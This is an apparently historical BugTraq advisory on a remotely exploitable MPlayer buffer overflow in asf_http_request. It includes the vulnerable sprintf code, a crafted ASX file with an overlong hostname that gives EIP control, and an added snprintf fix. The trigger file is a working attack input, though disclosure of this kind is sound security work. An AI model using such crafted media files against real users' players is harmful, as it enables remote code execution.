BugTraq
Mplayer Buffer Overflow Sep 26 2003 12:17AM
Otero, Hernan (hernan otero eds com)

Favorite Linux Player Buffer Overflow

Product: Mplayer
Developers: http://www.mplayerhq.hu
OS: all *NIX and Win32 ports
Remotely exploitable: YES

The developers have been contacted and the problem has been fixed; updating
your MPlayer version is recommended.

In the source tree there is a file called asf_streaming.c. This file has a
function named asf_http_request, and that function contains two buffer
overflows, both in the sprintf lines shown below.


asf_http_request {
    char str[250];      /* fixed-size buffer, no length check before sprintf */
    ....
    ...
    ..
    /* overflow 1: server_url->hostname is copied with no bound on its length */
    sprintf( str, "Host: %s:%d", server_url->hostname, server_url->port );
    ....
    ...
    ..
    /* overflow 2: same pattern with the hostname of the inner URL */
    sprintf( str, "Host: %s:%d", url->hostname, url->port );
    ....
    ...
    ..
}

At first glance this may look unexploitable (because of the MAXHOSTLEN size
restriction), but with an ASX file like the one below, where "badsite" is
listening on "badport" and answers with "\n\n", the result is a buffer
overflow with a fully controllable EIP.


<asx version = "3.0">
<title>Bad Site ASX</title>

<moreinfo href = "mailto:info@badsite.com" />
<logo href = "http://www.badsite.com/streaming/grupo.gif" style="ICON" />
<banner href= "images/bannermitre.gif">
<abstract>Bad Site live</abstract>
<moreinfo target="_blank" href = "http://www.badsite.com/" />
</banner>

<entry>
<title>NEWS</title>
<AUTHOR>NEWS</AUTHOR>
<COPYRIGHT>© All by the news</COPYRIGHT>
<ref href =
"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaa
aaaaaaaaaaaa"/>
<logo href = "http://badsite.com/streaming/grupo.gif" style="ICON" />
</entry>
</asx>
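As an added example (not MPlayer's code and not part of the original post), a bounded replacement for the two sprintf() calls above: the "Host: %s:%d" header is built with snprintf into the same 250-byte buffer, and a hostname that does not fit is rejected instead of written past the end of the buffer. The function names and the 'a'-filled test hostname are hypothetical.

```c
#include <stdio.h>
#include <string.h>

#define HOST_HDR_LEN 250   /* same size as str[250] in asf_http_request */

/* Hypothetical bounded replacement for the two sprintf() calls: writes
 * "Host: <hostname>:<port>" into dst and returns its length, or -1 when
 * the header would not fit (nothing is written past the end of dst). */
int build_host_header(char *dst, size_t dstlen, const char *hostname, int port)
{
    int n;
    if (dst == NULL || dstlen == 0 || hostname == NULL)
        return -1;
    n = snprintf(dst, dstlen, "Host: %s:%d", hostname, port);
    if (n < 0 || (size_t)n >= dstlen) {
        dst[0] = '\0';          /* never send a truncated header */
        return -1;
    }
    return n;
}

/* Builds the header into a 250-byte buffer, as the original code does,
 * and returns build_host_header()'s result. */
int host_header_result(const char *hostname, int port)
{
    char str[HOST_HDR_LEN];
    return build_host_header(str, sizeof str, hostname, port);
}

/* Constructed test input: a hostname made of `len` 'a' characters, like the
 * one in the ASX file above. Returns 1 if it is rejected, 0 if it fits. */
int rejects_long_hostname(size_t len)
{
    char host[1024];
    if (len >= sizeof host)
        return -1;
    memset(host, 'a', len);
    host[len] = '\0';
    return host_header_result(host, 80) < 0 ? 1 : 0;
}

int main(void)
{
    printf("short hostname: %d bytes\n", host_header_result("badsite", 8080));
    printf("240 x 'a': rejected=%d\n", rejects_long_hostname(240));
    printf("241 x 'a': rejected=%d\n", rejects_long_hostname(241));
    return 0;
}
```

With port 80 the header is the hostname length plus 9 bytes, so 240 'a's still fit in 250 bytes (with the terminating NUL) and 241 do not.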

Regards,

Hernán Otero
hernan.otero (at) eds (dot) com [email concealed]
